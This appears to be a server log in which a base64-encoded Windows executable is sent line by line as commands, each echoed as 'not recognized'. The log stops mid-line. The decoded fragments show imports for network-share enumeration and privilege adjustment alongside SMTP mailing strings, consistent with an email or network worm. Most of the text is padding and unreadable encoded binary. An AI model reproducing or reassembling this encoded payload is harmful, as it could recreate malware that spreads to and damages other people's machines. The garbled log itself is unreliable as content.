'umvnq3jlyxrls2v5qqaxaefkanvzdfrva2vuuhjpdmlszwdlcwd1aexvb2t1cfbyaxzpbgvn' not recognized. >>>> ZVZhbHVlQQBBRFZBUEkzMi5kbGwAAFdTMl8zMi5kbGwAABEAV05ldENsb3NlRW51bQAcAFdO **** Command 'zvzhbhvlqqbbrfzbuekzmi5kbgwaafdtml8zmi5kbgwaabeav05ldensb3nlrw51bqacafdo' not recognized. >>>> ZXRFbnVtUmVzb3VyY2VBAEAAV05ldE9wZW5FbnVtQQBNUFIuZGxsACYBR2V0TW9kdWxlSGFu **** Command 'zxrfbnvtumvzb3vyy2vbaeaav05lde9wzw5fbnvtqqbnufiuzgxsacybr2v0tw9kdwxlsgfu' not recognized. >>>> ZGxlQQAAUAFHZXRTdGFydHVwSW5mb0EAfQBFeGl0UHJvY2VzcwC/AEdldENQSW5mbwC5AEdl **** Command 'zgxlqqaauafhzxrtdgfydhvwsw5mb0eafqbfegl0uhjvy2vzcwc/aedldenqsw5mbwc5aedl' not recognized. >>>> dEFDUAAAMQFHZXRPRU1DUAAAvwFMQ01hcFN0cmluZ0EAAMABTENNYXBTdHJpbmdXAACfAUhl **** Command 'defduaaamqfhzxrpru1duaaavwfmq01hcfn0cmluz0eaamabtennyxbtdhjpbmdxaacfauhl' not recognized. >>>> YXBGcmVlAACZAUhlYXBBbGxvYwCtAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAsgBGcmVl **** Command 'yxbgcmvlaaczauhlyxbbbgxvywctalvuagfuzgxlzev4y2vwdglvbkzpbhrlcgaasgbgcmvl' not recognized. >>>> RW52aXJvbm1lbnRTdHJpbmdzQQCzAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXAAYBR2V0RW52 **** Command 'rw52axjvbm1lbnrtdhjpbmdzqqczaezyzwvfbnzpcm9ubwvudfn0cmluz3nxaaybr2v0rw52' not recognized. >>>> aXJvbm1lbnRTdHJpbmdzAAgBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAbQJTZXRIYW5kbGVD **** Command 'axjvbm1lbnrtdhjpbmdzaagbr2v0rw52axjvbm1lbnrtdhjpbmdzvwaabqjtzxriyw5kbgvd' not recognized. >>>> b3VudAAAUgFHZXRTdGRIYW5kbGUAABUBR2V0RmlsZVR5cGUAnQFIZWFwRGVzdHJveQCbAUhl **** Command 'b3vudaaaugfhzxrtdgriyw5kbguaabubr2v0rmlszvr5cguanqfizwfwrgvzdhjveqcbauhl' not recognized. >>>> YXBDcmVhdGUAAL8CVmlydHVhbEZyZWUALwJSdGxVbndpbmQAUwFHZXRTdHJpbmdUeXBlQQAA **** Command 'yxbdcmvhdguaal8cvmlydhvhbezyzwualwjsdgxvbndpbmqauwfhzxrtdhjpbmduexblqqaa' not recognized. >>>> VgFHZXRTdHJpbmdUeXBlVwAAuwJWaXJ0dWFsQWxsb2MAAKIBSGVhcFJlQWxsb2MAfAJTZXRT **** Command 'vgfhzxrtdhjpbmduexblvwaauwjwaxj0dwfsqwxsb2maakibsgvhcfjlqwxsb2mafajtzxrt' not recognized. >>>> dGRIYW5kbGUAAKoARmx1c2hGaWxlQnVmZmVycwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'dgriyw5kbguaakoarmx1c2hgawxlqnvmzmvycwaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> W4lAAG+zQAAAAAAAAAAAABS0QAAAAAAAAAAAAAAAAAAAAAAAMw1BAEAAAAAgAAAALAAAAC0t **** Command 'w4laag+zqaaaaaaaaaaaabs0qaaaaaaaaaaaaaaaaaaaaaaamw1baeaaaaagaaaalaaaac0t' not recognized. >>>> AABcAAAAUVVJVA0KAAANCi4NCgAAAERBVEEgDQoASEVMTyAlcw0KAAAAPg0KAE1BSUwgRlJP **** Command 'aabcaaaauvvjva0kaaanci4ncgaaaerbveegdqoasevmtyalcw0kaaaapg0kae1bsuwgrljp' not recognized. >>>> TTogPAAAAABSQ1BUIFRPOjwAAAAlZAAAIAkNCgAAAAAuLCgpJSRAIWB+IAAtXwAALi4AAC4A **** Command 'ttogpaaaaabsq1buifrpojwaaaalzaaaiakncgaaaaaulcgpjsraiwb+iaatxwaali4aac4a' not recognized. >>>> AABcKi4qAAAAAFxcAAAAAAAAiRV37zMZmXgQWLjJ8pkAAASa8yu5mZmZnhxsfOwsbHzseKxs **** Command 'aabcki4qaaaaafxcaaaaaaaairv37zmzmxgqwljj8pkaaasa8yu5mzmznhxsfowsbhzsekxs' not recognized. >>>> TJodzYx8Hc2MfJ65iax8eKxsTJqMXBkJnv3MvQw9bHx4fMzdmrwMvdye3Az8jKx4rGxMmgyM **** Command 'tjodzyx8hc2mfj65iax8ekxstjqmxbkjnv3mvqw9bhx4fmzdmrwmvdye3az8jkx4rgxmmgym' not recognized. >>>> LJ4cbHzsLGx87HisbEyaDWzNTMyeHGx87CxsfOx4rGxMmt1sTJ7tjAwcjHzseKxsTHgcLJrN **** Command 'lj4cbhzslgx87hisbeyadwzntmyehgx87cxsfox4rgxmmt1stj7tjawcjhzsekxsthgcljrn' not recognized. >>>> 3Lye/cy9DD1sfHh8zN2arQytnhxsfOwsbHzseKxsTJrdjLy8zJ7cDPyMrHisbEyavM2tHJ79 **** Command '3lye/cy9dd1sfhh8zn2arqytnhxsfowsbhzsekxstjrdjly8zj7cdpymrhisbeyavm2thj79' not recognized. >>>> zL0MPWx8eHzM3ZpMzSyMnu28SDyMnYx8eKxseDydmt1sLA1snu28SDyMnYx8eKxseDydmg1I **** Command 'zl0mpwx8ehzm3zpmzsymnu28sdymnyx8ekxsedydmt1sla1snu28sdymnyx8ekxsedydmg1i' not recognized. >>>> 7Z4dDHwczYx8zN14rGxMmt2MfOx8zJ65iax8eKxsTJoN3GwszA2euYmsfHisbEyarSwMfOws **** Command 